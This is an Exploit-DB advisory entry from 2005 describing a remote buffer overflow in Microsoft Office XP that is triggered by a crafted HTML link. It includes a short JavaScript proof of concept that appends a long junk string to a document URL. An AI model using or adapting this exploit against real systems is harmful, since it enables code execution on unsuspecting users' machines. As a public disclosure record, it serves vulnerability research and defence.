Microsoft Office XP 2000/2002 HTML Link Processing Remote Buffer Overflow Vulnerability

EDB-ID: 25085 CVE: N/A OSVDB-ID: N/A
Verified: Author: Rafel Ivgi Published: 2005-02-08
Download Exploit: Source Raw Download Vulnerable App: N/A
source: http://www.securityfocus.com/bid/12480/info

A remote buffer overflow vulnerability affects Microsoft Office XP. The problem presents itself when an unsuspecting user follows a malicious HTML link that points to a Office document. A boundary condition error is exposed during this operation that may allow attacker-specified data to corrupt process memory.

An attacker may leverage this issue to execute arbitrary code with the privileges of an unsuspecting user that follows a malicious embedded link.

<Script>
var mylongstring,myjunk;
mylongstring ="";
myjunk="bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbbbbb";
for(c=1;c<5000;c++)
{
mylongstring = mylongstring + myjunk;
}
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a"+mylongstring);
</script>